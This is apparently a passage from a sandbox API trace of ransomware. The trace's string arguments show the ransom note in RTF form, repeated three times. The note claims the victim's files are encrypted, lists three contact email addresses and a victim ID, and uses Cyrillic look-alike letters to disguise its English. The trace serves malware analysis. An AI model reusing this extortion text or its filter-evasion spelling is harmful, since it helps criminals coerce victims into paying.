t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us 